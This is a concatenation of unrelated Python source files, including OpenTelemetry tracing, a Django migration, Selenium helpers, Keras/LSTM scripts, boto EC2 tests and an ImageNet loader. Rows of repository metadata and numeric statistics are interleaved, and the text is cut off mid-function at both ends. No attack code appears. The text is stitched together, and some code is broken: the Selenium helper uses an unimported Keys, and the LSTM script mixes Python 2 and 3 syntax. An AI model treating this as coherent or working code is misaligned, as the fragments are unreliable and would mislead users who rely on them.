            span.set_attribute("faas.id", ctx_invoked_function_arn)

            # TODO: fix in Collector because these belong in resource attributes
            span.set_attribute("faas.name", lambda_name)
            span.set_attribute("faas.version", function_version)

            result = original_func(*args, **kwargs)

        # force_flush before function quit in case of Lambda freeze.
        self._tracer_provider.force_flush()

        return result
34.108333
151
0.716101
497
4,093
5.647887
0.382294
0.022444
0.029925
0.027075
0.133951
0.086926
0.066263
0.066263
0.034913
0.034913
0
0.006096
0.198387
4,093
119
152
34.394958
0.849436
0.374786
0
0.04
0
0
0.07109
0.020142
0
0
0
0.016807
0
1
0.06
false
0
0.2
0
0.3
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
1
0
0
0
0
0
0
0
0
0
0
1
fc572a69e6a41f7d2d8f4eb6c221dcaa2427e9e3
471
py
Python
instructors/migrations/0021_alter_user_avatar_url.py
bastoune57/gokiting_back_end
f3edcbeede292713349b28f2390b5d57e1420f8e
[ "MIT" ]
null
null
null
instructors/migrations/0021_alter_user_avatar_url.py
bastoune57/gokiting_back_end
f3edcbeede292713349b28f2390b5d57e1420f8e
[ "MIT" ]
null
null
null
instructors/migrations/0021_alter_user_avatar_url.py
bastoune57/gokiting_back_end
f3edcbeede292713349b28f2390b5d57e1420f8e
[ "MIT" ]
null
null
null
# Generated by Django 4.0.2 on 2022-04-01 16:09 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('instructors', '0020_alter_user_description_alter_user_title'), ] operations = [ migrations.AlterField( model_name='user', name='avatar_url', field=models.ImageField(default='profile_pics/einstein_EqBibwO.jpeg', upload_to='profile_pics'), ), ]
24.789474
108
0.651805
53
471
5.566038
0.792453
0.061017
0
0
0
0
0
0
0
0
0
0.052925
0.237792
471
18
109
26.166667
0.768802
0.095541
0
0
1
0
0.271226
0.183962
0
0
0
0
0
1
0
false
0
0.083333
0
0.333333
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
fc62c8d6aa28b5a801e73fa4abc1d1fe577304dd
1,884
py
Python
random-images/hexxy.py
dominicschaff/random
14a19b976a09c768ab8844b7cda237c17a92c9ae
[ "MIT" ]
null
null
null
random-images/hexxy.py
dominicschaff/random
14a19b976a09c768ab8844b7cda237c17a92c9ae
[ "MIT" ]
null
null
null
random-images/hexxy.py
dominicschaff/random
14a19b976a09c768ab8844b7cda237c17a92c9ae
[ "MIT" ]
null
null
null
from PIL import ImageDraw, Image from math import cos,sin,radians from random import randint import sys a = "a0A1b2B3c4C5d6D7e8E9f!F,g.G/h?H<i>I:j;J'k\"K\\l|L/m M\nn\tN@o#O$p%P^q&Q*r(R)s_S-t+T=u{U}v[V]w W x X y Y z Z" if len(a) > 128: print("TOO MANY CHARACTERS") sys.exit(1) # for i in a: # print("%s -> %d %d %d %d %d %d %d "%(i, # 1 if a.index(i) & 1 == 1 else 0, # 1 if a.index(i) & 2 == 2 else 0, # 1 if a.index(i) & 4 == 4 else 0, # 1 if a.index(i) & 8 == 8 else 0, # 1 if a.index(i) & 16 == 16 else 0, # 1 if a.index(i) & 32 == 32 else 0, # 1 if a.index(i) & 64 == 64 else 0, # )) # sys.exit(0) WHITE=(255,255,255) PINK=(217,154,197) BLUE=(103,170,249) BLACK=(0,0,0) img = Image.new('RGB', (2560,1600), BLACK) id = ImageDraw.Draw(img) def hex(offset, size): points = [] x,y = offset for angle in range(0, 360, 60): x += cos(radians(angle)) * size y += sin(radians(angle)) * size points.append((x, y)) return points def drawHex(id, sx,sy,s,c): ox = sx - cos(radians(120)) * s oy = sy - sin(radians(120)) * s id.polygon(hex((ox-s,oy-s*2),s), fill=BLUE if c & 1 == 1 else PINK) id.polygon(hex((ox+s,oy-s*2),s), fill=BLUE if c & 2 == 2 else PINK) id.polygon(hex((ox-s*2,oy),s), fill=BLUE if c & 4 == 4 else PINK) id.polygon(hex((ox,oy),s), fill=BLUE if c & 8 == 8 else PINK) id.polygon(hex((ox+s*2,oy),s), fill=BLUE if c & 16 == 16 else PINK) id.polygon(hex((ox-s,oy+s*2),s), fill=BLUE if c & 32 == 32 else PINK) id.polygon(hex((ox+s,oy+s*2),s), fill=BLUE if c & 64 == 64 else PINK) q = """This is a test 0123456789%""" s = 10 cutOff = int(2560/(s*7)) print (cutOff) x,y = 0,0 for c in q: drawHex(id, s*2 + x*s*7, s*3 + y*s*7, s, a.index(c)) x+=1 if x >= cutOff or c == "\n": x,y = 0,y+1 img.show()
28.545455
113
0.537686
396
1,884
2.555556
0.270202
0.023715
0.027668
0.062253
0.362648
0.352767
0.310277
0.221344
0.221344
0.221344
0
0.107397
0.253716
1,884
66
114
28.545455
0.612376
0.196921
0
0
0
0.204545
0.061252
0.027963
0
0
0
0
0
1
0.045455
false
0
0.090909
0
0.159091
0.045455
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
fc66cd08fbbe334f7cc1e76eb76063eb07e5b49e
673
py
Python
music/distance/aural/diatonic/__init__.py
jedhsu/music
dea68c4a82296cd4910e786f533b2cbf861377c3
[ "MIT" ]
null
null
null
music/distance/aural/diatonic/__init__.py
jedhsu/music
dea68c4a82296cd4910e786f533b2cbf861377c3
[ "MIT" ]
null
null
null
music/distance/aural/diatonic/__init__.py
jedhsu/music
dea68c4a82296cd4910e786f533b2cbf861377c3
[ "MIT" ]
null
null
null
""" *mus . it . dia* The simple diatonic intervals. """ from .second import MinorSecond from .second import MajorSecond from .third import MinorThird from .third import MajorThird from .fourth import PerfectFourth from .fifth import Tritone from .fifth import PerfectFifth from .sixth import MinorSixth from .sixth import MajorSixth from .seventh import MinorSeventh from .seventh import MajorSeventh from .eighth import Octave __all__ = [ "MinorSecond", "MajorSecond", "MinorThird", "MajorThird", "PerfectFourth", "Tritone", "PerfectFifth", "MinorSixth", "MajorSixth", "MinorSeventh", "MajorSeventh", "Octave", ]
18.694444
33
0.708767
68
673
6.955882
0.426471
0.042283
0.067653
0
0
0
0
0
0
0
0
0
0.199108
673
35
34
19.228571
0.877551
0.071322
0
0
0
0
0.203612
0
0
0
0
0
0
1
0
false
0
0.461538
0
0.461538
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
1
0
0
0
0
1
fc6780fb69ebe4416f273d6821ceb9f2cb3226e8
760
py
Python
selenium_tests/test_functions.py
AriTheGuitarMan/AriTheGuitarMan.github.io
8348ad0c47e48477560e7e40ec7eac8bca6fcdfa
[ "MIT" ]
null
null
null
selenium_tests/test_functions.py
AriTheGuitarMan/AriTheGuitarMan.github.io
8348ad0c47e48477560e7e40ec7eac8bca6fcdfa
[ "MIT" ]
null
null
null
selenium_tests/test_functions.py
AriTheGuitarMan/AriTheGuitarMan.github.io
8348ad0c47e48477560e7e40ec7eac8bca6fcdfa
[ "MIT" ]
null
null
null
# this file holds some common testing functions from selenium.webdriver.support.wait import WebDriverWait from selenium.webdriver.support import expected_conditions as EC from selenium.webdriver.common.by import By depurl = "localhost:3000" def getElement(driver, xpath): return WebDriverWait(driver, 10).until(EC.presence_of_element_located((By.XPATH, xpath))) def login(driver, username, password): driver.get(depurl) elem = getElement(driver, "//input[@id='username']") elem.clear() elem.send_keys(username) elem = getElement(driver, "//input[@id='password']") elem.clear() elem.send_keys(password) elem.send_keys(Keys.RETURN) def logout(driver): elem = getElement(driver, "//a[text()='Logout']") elem.click()
33.043478
93
0.727632
98
760
5.571429
0.479592
0.117216
0.115385
0.102564
0.175824
0
0
0
0
0
0
0.009146
0.136842
760
23
94
33.043478
0.823171
0.059211
0
0.111111
0
0
0.112045
0.064426
0
0
0
0
0
1
0.166667
false
0.166667
0.166667
0.055556
0.388889
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
1
0
0
0
0
0
1
fc69e76506c689aa4c8cc54b37cd338453f7483a
1,256
py
Python
scripts/convert_keras2onnx.py
ecmwf-lab/infero
4fec006175af48cd0313b2f89722c01636e961db
[ "Apache-2.0" ]
8
2021-12-20T06:24:16.000Z
2022-02-17T15:21:55.000Z
scripts/convert_keras2onnx.py
ecmwf-projects/infero
4c229a16ce75a249c83cbf43e0c953a7a42f2f83
[ "Apache-2.0" ]
null
null
null
scripts/convert_keras2onnx.py
ecmwf-projects/infero
4c229a16ce75a249c83cbf43e0c953a7a42f2f83
[ "Apache-2.0" ]
1
2021-10-04T10:14:23.000Z
2021-10-04T10:14:23.000Z
# # (C) Copyright 1996- ECMWF. # # This software is licensed under the terms of the Apache Licence Version 2.0 # which can be obtained at http://www.apache.org/licenses/LICENSE-2.0. # In applying this licence, ECMWF does not waive the privileges and immunities # granted to it by virtue of its status as an intergovernmental organisation # nor does it submit to any jurisdiction. # import os import numpy as np import argparse import keras import keras2onnx if __name__ == "__main__": """ Lightweight script to convert a keras model into a TFlite model """ parser = argparse.ArgumentParser("Data Augmentation") parser.add_argument('keras_model_path', help="Path of the input keras model") parser.add_argument('onnx_model_path', help="Path of the output onnx model") parser.add_argument("--verify_with", help="Check the model by passing an input numpy path") args = parser.parse_args() # load the keras model model = keras.models.load_model(args.keras_model_path) model.summary() # do the conversion onnx_model = keras2onnx.convert_keras(model, model.name) # write to file file = open(args.onnx_model_path, "wb") file.write(onnx_model.SerializeToString()) file.close()
30.634146
95
0.72293
181
1,256
4.878453
0.524862
0.06795
0.057758
0.038505
0.04983
0.04983
0
0
0
0
0
0.009823
0.18949
1,256
40
96
31.4
0.857564
0.33121
0
0
0
0
0.233957
0
0
0
0
0
0
1
0
false
0.058824
0.294118
0
0.294118
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
1
0
0
0
0
0
1
fc6bbad5b323947c5f4946373831830060872620
5,961
py
Python
lstm-synthetic-wave-anomaly-detect.py
cse-icon-dataAnalytics/lstm-anomaly-detect
bcfb01db383698acbd5692f1a76a5f20ec3629a8
[ "MIT" ]
178
2016-03-31T05:32:07.000Z
2022-03-26T02:36:35.000Z
lstm-synthetic-wave-anomaly-detect.py
rob-med/lstm-anomaly-detect
bcfb01db383698acbd5692f1a76a5f20ec3629a8
[ "MIT" ]
4
2016-11-01T01:51:06.000Z
2018-04-24T13:42:33.000Z
lstm-synthetic-wave-anomaly-detect.py
rob-med/lstm-anomaly-detect
bcfb01db383698acbd5692f1a76a5f20ec3629a8
[ "MIT" ]
106
2016-03-31T05:32:11.000Z
2021-08-28T09:49:16.000Z
""" Inspired by example from https://github.com/Vict0rSch/deep_learning/tree/master/keras/recurrent Uses the TensorFlow backend The basic idea is to detect anomalies in a time-series. """ import matplotlib.pyplot as plt import numpy as np import time from keras.layers.core import Dense, Activation, Dropout from keras.layers.recurrent import LSTM from keras.models import Sequential from numpy import arange, sin, pi, random np.random.seed(1234) # Global hyper-parameters sequence_length = 100 random_data_dup = 10 # each sample randomly duplicated between 0 and 9 times, see dropin function epochs = 1 batch_size = 50 def dropin(X, y): """ The name suggests the inverse of dropout, i.e. adding more samples. See Data Augmentation section at http://simaaron.github.io/Estimating-rainfall-from-weather-radar-readings-using-recurrent-neural-networks/ :param X: Each row is a training sequence :param y: Tne target we train and will later predict :return: new augmented X, y """ print("X shape:", X.shape) print("y shape:", y.shape) X_hat = [] y_hat = [] for i in range(0, len(X)): for j in range(0, np.random.random_integers(0, random_data_dup)): X_hat.append(X[i, :]) y_hat.append(y[i]) return np.asarray(X_hat), np.asarray(y_hat) def gen_wave(): """ Generate a synthetic wave by adding up a few sine waves and some noise :return: the final wave """ t = np.arange(0.0, 10.0, 0.01) wave1 = sin(2 * 2 * pi * t) noise = random.normal(0, 0.1, len(t)) wave1 = wave1 + noise print("wave1", len(wave1)) wave2 = sin(2 * pi * t) print("wave2", len(wave2)) t_rider = arange(0.0, 0.5, 0.01) wave3 = sin(10 * pi * t_rider) print("wave3", len(wave3)) insert = round(0.8 * len(t)) wave1[insert:insert + 50] = wave1[insert:insert + 50] + wave3 return wave1 + wave2 def z_norm(result): result_mean = result.mean() result_std = result.std() result -= result_mean result /= result_std return result, result_mean def get_split_prep_data(train_start, train_end, test_start, test_end): data = gen_wave() print("Length of 
Data", len(data)) # train data print "Creating train data..." result = [] for index in range(train_start, train_end - sequence_length): result.append(data[index: index + sequence_length]) result = np.array(result) # shape (samples, sequence_length) result, result_mean = z_norm(result) print "Mean of train data : ", result_mean print "Train data shape : ", result.shape train = result[train_start:train_end, :] np.random.shuffle(train) # shuffles in-place X_train = train[:, :-1] y_train = train[:, -1] X_train, y_train = dropin(X_train, y_train) # test data print "Creating test data..." result = [] for index in range(test_start, test_end - sequence_length): result.append(data[index: index + sequence_length]) result = np.array(result) # shape (samples, sequence_length) result, result_mean = z_norm(result) print "Mean of test data : ", result_mean print "Test data shape : ", result.shape X_test = result[:, :-1] y_test = result[:, -1] print("Shape X_train", np.shape(X_train)) print("Shape X_test", np.shape(X_test)) X_train = np.reshape(X_train, (X_train.shape[0], X_train.shape[1], 1)) X_test = np.reshape(X_test, (X_test.shape[0], X_test.shape[1], 1)) return X_train, y_train, X_test, y_test def build_model(): model = Sequential() layers = {'input': 1, 'hidden1': 64, 'hidden2': 256, 'hidden3': 100, 'output': 1} model.add(LSTM( input_length=sequence_length - 1, input_dim=layers['input'], output_dim=layers['hidden1'], return_sequences=True)) model.add(Dropout(0.2)) model.add(LSTM( layers['hidden2'], return_sequences=True)) model.add(Dropout(0.2)) model.add(LSTM( layers['hidden3'], return_sequences=False)) model.add(Dropout(0.2)) model.add(Dense( output_dim=layers['output'])) model.add(Activation("linear")) start = time.time() model.compile(loss="mse", optimizer="rmsprop") print "Compilation Time : ", time.time() - start return model def run_network(model=None, data=None): global_start_time = time.time() if data is None: print 'Loading data... 
' # train on first 700 samples and test on next 300 samples (has anomaly) X_train, y_train, X_test, y_test = get_split_prep_data(0, 700, 500, 1000) else: X_train, y_train, X_test, y_test = data print '\nData Loaded. Compiling...\n' if model is None: model = build_model() try: print("Training...") model.fit( X_train, y_train, batch_size=batch_size, nb_epoch=epochs, validation_split=0.05) print("Predicting...") predicted = model.predict(X_test) print("Reshaping predicted") predicted = np.reshape(predicted, (predicted.size,)) except KeyboardInterrupt: print("prediction exception") print 'Training duration (s) : ', time.time() - global_start_time return model, y_test, 0 try: plt.figure(1) plt.subplot(311) plt.title("Actual Test Signal w/Anomalies") plt.plot(y_test[:len(y_test)], 'b') plt.subplot(312) plt.title("Predicted Signal") plt.plot(predicted[:len(y_test)], 'g') plt.subplot(313) plt.title("Squared Error") mse = ((y_test - predicted) ** 2) plt.plot(mse, 'r') plt.show() except Exception as e: print("plotting exception") print str(e) print 'Training duration (s) : ', time.time() - global_start_time return model, y_test, predicted run_network()
30.258883
110
0.631102
843
5,961
4.326216
0.282325
0.021387
0.032904
0.019742
0.178503
0.178503
0.164793
0.157938
0.139841
0.139841
0
0.028331
0.242073
5,961
196
111
30.413265
0.778884
0.045798
0
0.142857
0
0
0.105096
0
0
0
0
0
0
0
null
null
0
0.05
null
null
0.178571
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
1
0
0
0
0
0
0
0
0
1
fc6d62eed45d350cb72c202ceedfb98394117cd4
315
py
Python
venv/Lib/site-packages/har2case/__about__.py
Verckolf/MyInterfaceTest
e05674bd673a6a43cfb33f7cb4318886ba92a05c
[ "MIT" ]
null
null
null
venv/Lib/site-packages/har2case/__about__.py
Verckolf/MyInterfaceTest
e05674bd673a6a43cfb33f7cb4318886ba92a05c
[ "MIT" ]
null
null
null
venv/Lib/site-packages/har2case/__about__.py
Verckolf/MyInterfaceTest
e05674bd673a6a43cfb33f7cb4318886ba92a05c
[ "MIT" ]
null
null
null
__title__ = 'har2case' __description__ = 'Convert HAR(HTTP Archive) to YAML/JSON testcases for HttpRunner.' __url__ = 'https://github.com/HttpRunner/har2case' __version__ = '0.2.0' __author__ = 'debugtalk' __author_email__ = 'mail@debugtalk.com' __license__ = 'Apache-2.0' __copyright__ = 'Copyright 2017 debugtalk'
39.375
84
0.771429
38
315
5.526316
0.736842
0.019048
0
0
0
0
0
0
0
0
0
0.038869
0.101587
315
8
85
39.375
0.70318
0
0
0
0
0
0.556962
0
0
0
0
0
0
1
0
false
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
fc7137abb720c86400bb993740cb9e14c54237f5
8,892
py
Python
tests/integration/ec2/test_connection.py
bopopescu/debpkg_python-boto
06f9b6f3693ba1933be8214da69cebcd5212cd97
[ "MIT" ]
15
2015-03-25T05:24:11.000Z
2021-12-18T04:24:06.000Z
tests/integration/ec2/test_connection.py
bopopescu/debpkg_python-boto
06f9b6f3693ba1933be8214da69cebcd5212cd97
[ "MIT" ]
null
null
null
tests/integration/ec2/test_connection.py
bopopescu/debpkg_python-boto
06f9b6f3693ba1933be8214da69cebcd5212cd97
[ "MIT" ]
10
2015-04-26T17:56:37.000Z
2020-09-24T14:01:53.000Z
# Copyright (c) 2006-2010 Mitch Garnaat http://garnaat.org/
# Copyright (c) 2009, Eucalyptus Systems, Inc.
# All rights reserved.
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.

"""
Some unit tests for the EC2Connection

FIX: the original used Python-2-only syntax (print statements and
``except EC2ResponseError, e``), a SyntaxError on Python 3; modernized
to ``print(...)`` and ``except ... as e`` with behavior unchanged.
"""

import unittest
import time
import telnetlib
import socket

from nose.plugins.attrib import attr

from boto.ec2.connection import EC2Connection
from boto.exception import EC2ResponseError


class EC2ConnectionTest(unittest.TestCase):
    """Live integration tests against EC2 (require real credentials)."""

    ec2 = True

    @attr('notdefault')
    def test_launch_permissions(self):
        """Toggle an AMI's launch permissions and verify each transition."""
        # this is my user_id, if you want to run these tests you should
        # replace this with yours or they won't work
        user_id = '963068290131'
        print('--- running EC2Connection tests ---')
        c = EC2Connection()
        # get list of private AMI's
        rs = c.get_all_images(owners=[user_id])
        assert len(rs) > 0
        # now pick the first one
        image = rs[0]
        # temporarily make this image runnable by everyone
        status = image.set_launch_permissions(group_names=['all'])
        assert status
        d = image.get_launch_permissions()
        assert 'groups' in d
        assert len(d['groups']) > 0
        # now remove that permission
        status = image.remove_launch_permissions(group_names=['all'])
        assert status
        time.sleep(10)
        d = image.get_launch_permissions()
        assert 'groups' not in d

    def test_1_basic(self):
        """End-to-end: security groups, instance launch, key pairs, paid AMIs."""
        # create 2 new security groups
        c = EC2Connection()
        group1_name = 'test-%d' % int(time.time())
        group_desc = 'This is a security group created during unit testing'
        group1 = c.create_security_group(group1_name, group_desc)
        time.sleep(2)
        group2_name = 'test-%d' % int(time.time())
        group_desc = 'This is a security group created during unit testing'
        group2 = c.create_security_group(group2_name, group_desc)
        # now get a listing of all security groups and look for our new one
        rs = c.get_all_security_groups()
        found = False
        for g in rs:
            if g.name == group1_name:
                found = True
        assert found
        # now pass arg to filter results to only our new group
        rs = c.get_all_security_groups([group1_name])
        assert len(rs) == 1
        # try some group to group authorizations/revocations
        # first try the old style
        status = c.authorize_security_group(group1.name,
                                            group2.name,
                                            group2.owner_id)
        assert status
        status = c.revoke_security_group(group1.name,
                                         group2.name,
                                         group2.owner_id)
        assert status
        # now try specifying a specific port
        status = c.authorize_security_group(group1.name,
                                            group2.name,
                                            group2.owner_id,
                                            'tcp', 22, 22)
        assert status
        status = c.revoke_security_group(group1.name,
                                         group2.name,
                                         group2.owner_id,
                                         'tcp', 22, 22)
        assert status
        # now delete the second security group
        status = c.delete_security_group(group2_name)
        # now make sure it's really gone
        rs = c.get_all_security_groups()
        found = False
        for g in rs:
            if g.name == group2_name:
                found = True
        assert not found
        group = group1
        # now try to launch apache image with our new security group
        rs = c.get_all_images()
        img_loc = 'ec2-public-images/fedora-core4-apache.manifest.xml'
        for image in rs:
            if image.location == img_loc:
                break
        reservation = image.run(security_groups=[group.name])
        instance = reservation.instances[0]
        while instance.state != 'running':
            print('\tinstance is %s' % instance.state)
            time.sleep(30)
            instance.update()
        # instance in now running, try to telnet to port 80
        t = telnetlib.Telnet()
        try:
            t.open(instance.dns_name, 80)
        except socket.error:
            # expected: port 80 not yet authorized
            pass
        # now open up port 80 and try again, it should work
        group.authorize('tcp', 80, 80, '0.0.0.0/0')
        t.open(instance.dns_name, 80)
        t.close()
        # now revoke authorization and try again
        group.revoke('tcp', 80, 80, '0.0.0.0/0')
        try:
            t.open(instance.dns_name, 80)
        except socket.error:
            pass
        # now kill the instance and delete the security group
        instance.terminate()
        # check that state and previous_state have updated
        assert instance.state == 'shutting-down'
        assert instance.state_code == 32
        assert instance.previous_state == 'running'
        assert instance.previous_state_code == 16
        # unfortunately, I can't delete the sg within this script
        #sg.delete()

        # create a new key pair
        key_name = 'test-%d' % int(time.time())
        status = c.create_key_pair(key_name)
        assert status
        # now get a listing of all key pairs and look for our new one
        rs = c.get_all_key_pairs()
        found = False
        for k in rs:
            if k.name == key_name:
                found = True
        assert found
        # now pass arg to filter results to only our new key pair
        rs = c.get_all_key_pairs([key_name])
        assert len(rs) == 1
        key_pair = rs[0]
        # now delete the key pair
        status = c.delete_key_pair(key_name)
        # now make sure it's really gone
        rs = c.get_all_key_pairs()
        found = False
        for k in rs:
            if k.name == key_name:
                found = True
        assert not found

        # short test around Paid AMI capability
        demo_paid_ami_id = 'ami-bd9d78d4'
        demo_paid_ami_product_code = 'A79EC0DB'
        l = c.get_all_images([demo_paid_ami_id])
        assert len(l) == 1
        assert len(l[0].product_codes) == 1
        assert l[0].product_codes[0] == demo_paid_ami_product_code

        print('--- tests completed ---')

    def test_dry_run(self):
        """DryRun requests must raise EC2ResponseError with the DryRun message."""
        c = EC2Connection()
        dry_run_msg = 'Request would have succeeded, but DryRun flag is set.'

        try:
            rs = c.get_all_images(dry_run=True)
            self.fail("Should have gotten an exception")
        except EC2ResponseError as e:
            self.assertTrue(dry_run_msg in str(e))

        try:
            rs = c.run_instances(
                image_id='ami-a0cd60c9',
                instance_type='m1.small',
                dry_run=True
            )
            self.fail("Should have gotten an exception")
        except EC2ResponseError as e:
            self.assertTrue(dry_run_msg in str(e))

        # Need an actual instance for the rest of this...
        rs = c.run_instances(
            image_id='ami-a0cd60c9',
            instance_type='m1.small'
        )
        time.sleep(120)

        try:
            rs = c.stop_instances(
                instance_ids=[rs.instances[0].id],
                dry_run=True
            )
            self.fail("Should have gotten an exception")
        except EC2ResponseError as e:
            self.assertTrue(dry_run_msg in str(e))

        try:
            rs = c.terminate_instances(
                instance_ids=[rs.instances[0].id],
                dry_run=True
            )
            self.fail("Should have gotten an exception")
        except EC2ResponseError as e:
            self.assertTrue(dry_run_msg in str(e))

        # And kill it.
        rs.instances[0].terminate()
36.743802
77
0.587607
1,138
8,892
4.471002
0.269772
0.007665
0.013758
0.01592
0.394654
0.368907
0.338443
0.306997
0.30228
0.30228
0
0.024518
0.334908
8,892
241
78
36.896266
0.835813
0.263383
0
0.52439
0
0
0.09129
0.00775
0
0
0
0
0.170732
0
null
null
0.012195
0.042683
null
null
0.018293
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
1
0
0
0
0
0
0
0
0
1
fc7fb355e0004487d0ead15c251476f2cd39193b
2,658
py
Python
datasets/imagenet.py
xhchrn/open_lth
6b3d04a12a2f868ce851bd09b330ea57957c1de6
[ "MIT" ]
9
2021-03-30T20:43:26.000Z
2021-12-28T06:25:17.000Z
datasets/imagenet.py
xhchrn/open_lth
6b3d04a12a2f868ce851bd09b330ea57957c1de6
[ "MIT" ]
null
null
null
datasets/imagenet.py
xhchrn/open_lth
6b3d04a12a2f868ce851bd09b330ea57957c1de6
[ "MIT" ]
2
2021-03-31T01:19:48.000Z
2021-08-02T13:41:32.000Z
# Copyright (c) Facebook, Inc. and its affiliates.
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.

import concurrent.futures
import numpy as np
import os
from PIL import Image
import torchvision

from datasets import base
from platforms.platform import get_platform


def _get_samples(root, y_name, y_num):
    """Return [(path, y_num), ...] for every '*.jpeg' file under root/y_name.

    Returns [] when the class directory does not exist.
    """
    y_dir = os.path.join(root, y_name)
    if not get_platform().isdir(y_dir):
        return []
    output = [(os.path.join(y_dir, f), y_num)
              for f in get_platform().listdir(y_dir) if f.lower().endswith('jpeg')]
    return output


class Dataset(base.ImageDataset):
    """ImageNet"""

    def __init__(self, loc: str, image_transforms):
        # Load the data. Class label = index of the class directory in
        # sorted order.
        classes = sorted(get_platform().listdir(loc))
        samples = []

        if get_platform().num_workers > 0:
            # Scan class directories in parallel.
            executor = concurrent.futures.ThreadPoolExecutor(
                max_workers=get_platform().num_workers)
            futures = [executor.submit(_get_samples, loc, y_name, y_num)
                       for y_num, y_name in enumerate(classes)]
            # NOTE(review): concurrent.futures.wait returns the done-set in
            # arbitrary order, so sample ordering can differ from the
            # sequential branch below — confirm downstream shuffling makes
            # this irrelevant.
            for d in concurrent.futures.wait(futures)[0]:
                samples += d.result()
        else:
            for y_num, y_name in enumerate(classes):
                samples += _get_samples(loc, y_name, y_num)

        examples, labels = zip(*samples)
        super(Dataset, self).__init__(
            np.array(examples), np.array(labels), image_transforms,
            # Standard ImageNet channel normalization constants.
            [torchvision.transforms.Normalize([0.485, 0.456, 0.406],
                                              [0.229, 0.224, 0.225])])

    @staticmethod
    def num_train_examples():
        return 1281167

    @staticmethod
    def num_test_examples():
        return 50000

    @staticmethod
    def num_classes():
        return 1000

    @staticmethod
    def _augment_transforms():
        # Training-time augmentation: random crop + horizontal flip.
        return [
            torchvision.transforms.RandomResizedCrop(224, scale=(0.1, 1.0),
                                                     ratio=(0.8, 1.25)),
            torchvision.transforms.RandomHorizontalFlip()
        ]

    @staticmethod
    def _transforms():
        # Eval-time resize + center crop.
        return [torchvision.transforms.Resize(256),
                torchvision.transforms.CenterCrop(224)]

    @staticmethod
    def get_train_set(use_augmentation, resize):
        # NOTE(review): `resize` is accepted but unused here — presumably
        # kept for interface parity with sibling datasets; confirm.
        transforms = Dataset._augment_transforms() if use_augmentation else Dataset._transforms()
        return Dataset(os.path.join(get_platform().imagenet_root, 'train'), transforms)

    @staticmethod
    def get_test_set(resize):
        return Dataset(os.path.join(get_platform().imagenet_root, 'val'),
                       Dataset._transforms())

    @staticmethod
    def example_to_image(example):
        """Load the image at path *example* and return it as an RGB PIL image."""
        with get_platform().open(example, 'rb') as fp:
            return Image.open(fp).convert('RGB')


DataLoader = base.DataLoader
33.225
115
0.677201
341
2,658
5.085044
0.363636
0.057093
0.023068
0.015571
0.113033
0.113033
0.113033
0.087659
0.053057
0
0
0.028612
0.211061
2,658
79
116
33.64557
0.798283
0.072611
0
0.148148
0
0
0.006922
0
0
0
0
0
0
1
0.185185
false
0
0.12963
0.111111
0.444444
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
1
0
0
0
1
fc8903dace15225a2f4484e8807d8da8761b6a96
2,761
py
Python
hdfs_kernel/exceptions.py
Jasper912/jupyter-hdfs-kernel
4b933cab675cb908a1d2332f040c7fce697fce61
[ "MIT" ]
3
2019-10-28T02:52:46.000Z
2019-12-24T09:11:48.000Z
hdfs_kernel/exceptions.py
Jasper912/jupyter-hdfs-kernel
4b933cab675cb908a1d2332f040c7fce697fce61
[ "MIT" ]
null
null
null
hdfs_kernel/exceptions.py
Jasper912/jupyter-hdfs-kernel
4b933cab675cb908a1d2332f040c7fce697fce61
[ "MIT" ]
null
null
null
#!/usr/bin/env python
# -*- coding=utf-8 -*-
#
# Author: huangnj
# Time: 2019/09/27

import traceback
from functools import wraps

from hdfs_kernel.constants import EXPECTED_ERROR_MSG, INTERNAL_ERROR_MSG
from hdfs.util import HdfsError


# == EXCEPTIONS ==
class SessionManagementException(Exception):
    """Raised when a kernel session cannot be created or managed."""
    pass


class CommandNotAllowedException(Exception):
    """Raised when the user invokes a command that is not permitted."""
    pass


class CommandExecuteException(Exception):
    """Raised when execution of an HDFS command fails."""
    pass


# option parse Error
class OptionParsingError(RuntimeError):
    """Raised when parsing of magic options fails."""
    pass


class OptionParsingExit(Exception):
    """Raised when the option parser requests an early exit (e.g. --help)."""

    def __init__(self, status, msg):
        # BUGFIX: initialize the Exception base with the message so that
        # str(exc) carries it instead of being empty.
